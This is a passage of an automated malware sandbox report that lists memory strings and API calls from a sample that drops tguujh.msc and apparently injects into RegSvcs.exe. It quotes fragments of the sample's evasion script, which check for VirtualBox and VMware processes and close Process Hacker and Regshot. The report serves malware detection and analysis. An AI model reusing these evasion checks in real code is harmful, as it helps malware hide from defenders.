                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: tguujh.msc.exe, 00000010.00000002.1735445912.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE8;0\
                Source: tguujh.msc, 0000000A.00000003.1595065546.000000000133E000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001337000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593328458.000000000133D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: tguujh.msc.exe, 00000010.00000002.1735445912.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESY<Q_
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp, nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: tguujh.msc.exe, 00000010.00000002.1735445912.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEE:U]
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp, nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732163287.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731961848.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733661538.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1734246366.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731724804.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000002.1735063926.00000000016C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")KDW]
                Source: tguujh.msc, 0000000A.00000003.1592648815.0000000001337000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1595025401.0000000001339000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595990222.0000000001335000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592955710.000000000132F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592989297.0000000001334000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731814369.00000000016B1000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732105596.00000000016B1000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732163287.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731961848.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733661538.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731724804.00000000016B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")_L
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp, nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED096E rdtsc 15_2_00ED096E
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscAPI coverage: 5.1 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.6 %
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeAPI coverage: 5.1 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_0099F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0099F826
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_009B1630
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009C1FF8 FindFirstFileExA,0_2_009C1FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00CBE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CC9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CCA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00CCA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC65F1 FindFirstFileW,FindNextFileW,FindClose,10_2_00CC65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C8C642 FindFirstFileExW,10_2_00C8C642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00CC72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC7248 FindFirstFileW,FindClose,10_2_00CC7248
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C2E387
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2D836
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2DB69
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C39F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C39F9F
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C3A0FA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C3A488
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C365F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00C365F1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BFC642 FindFirstFileExW,16_2_00BFC642
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C372E9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C37248 FindFirstFileW,FindClose,16_2_00C37248
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B4E14 VirtualQuery,GetSystemInfo,0_2_009B4E14
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Local\Temp\RarSFX0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Jump to behavior
                Source: tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
                Source: tguujh.msc, 0000000A.00000003.1594782998.000000000137B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execrosoh
                Source: tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: tguujh.msc, 0000000A.00000002.1595954813.000000000132D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenUT
                Source: tguujh.msc.exe, 00000010.00000003.1731961848.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7
                Source: nhhjmppg.dll.10.drBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1731961848.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
                Source: nhhjmppg.dll.10.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593096189.000000000136B000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593197392.0000000001372000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1594654841.0000000001383000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593986669.0000000001373000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732066040.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731814369.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732125606.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733232602.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732282969.00000000016F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                Source: tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenUT
                Source: tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenw
                Source: tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: nhhjmppg.dll.10.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1731961848.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
                Source: tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733742539.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733956548.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733452273.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733417726.000000000169C000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000002.1734949458.00000000016A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenSFX
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeAPI call chain: ExitProcess graph end nodegraph_0-28789
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED096E rdtsc 15_2_00ED096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00417D83 LdrLoadDll,15_2_00417D83
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF3FF BlockInput,10_2_00CCF3FF
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B6878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C55D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00C55D78
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009BECAA mov eax, dword ptr fs:[00000030h]0_2_009BECAA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C75078 mov eax, dword ptr fs:[00000030h]10_2_00C75078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E980E9 mov eax, dword ptr fs:[00000030h]15_2_00E980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8A0E3 mov ecx, dword ptr fs:[00000030h]15_2_00E8A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F160E0 mov eax, dword ptr fs:[00000030h]15_2_00F160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C0F0 mov eax, dword ptr fs:[00000030h]15_2_00E8C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED20F0 mov ecx, dword ptr fs:[00000030h]15_2_00ED20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F120DE mov eax, dword ptr fs:[00000030h]15_2_00F120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F560B8 mov eax, dword ptr fs:[00000030h]15_2_00F560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F560B8 mov ecx, dword ptr fs:[00000030h]15_2_00F560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F280A8 mov eax, dword ptr fs:[00000030h]15_2_00F280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9208A mov eax, dword ptr fs:[00000030h]15_2_00E9208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBC073 mov eax, dword ptr fs:[00000030h]15_2_00EBC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F16050 mov eax, dword ptr fs:[00000030h]15_2_00F16050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E92050 mov eax, dword ptr fs:[00000030h]15_2_00E92050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26030 mov eax, dword ptr fs:[00000030h]15_2_00F26030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8A020 mov eax, dword ptr fs:[00000030h]15_2_00E8A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8C020 mov eax, dword ptr fs:[00000030h]15_2_00E8C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F14000 mov ecx, dword ptr fs:[00000030h]15_2_00F14000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h]15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h]15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h]15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h]15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h]15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F661E5 mov eax, dword ptr fs:[00000030h]15_2_00F661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC01F8 mov eax, dword ptr fs:[00000030h]15_2_00EC01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h]15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h]15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E1D0 mov ecx, dword ptr fs:[00000030h]15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h]15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h]15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F561C3 mov eax, dword ptr fs:[00000030h]15_2_00F561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F561C3 mov eax, dword ptr fs:[00000030h]15_2_00F561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED0185 mov eax, dword ptr fs:[00000030h]15_2_00ED0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h]15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h]15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h]15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h]15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F34180 mov eax, dword ptr fs:[00000030h]15_2_00F34180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F34180 mov eax, dword ptr fs:[00000030h]15_2_00F34180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4C188 mov eax, dword ptr fs:[00000030h]15_2_00F4C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4C188 mov eax, dword ptr fs:[00000030h]15_2_00F4C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8A197 mov eax, dword ptr fs:[00000030h]15_2_00E8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8A197 mov eax, dword ptr fs:[00000030h]15_2_00E8A197
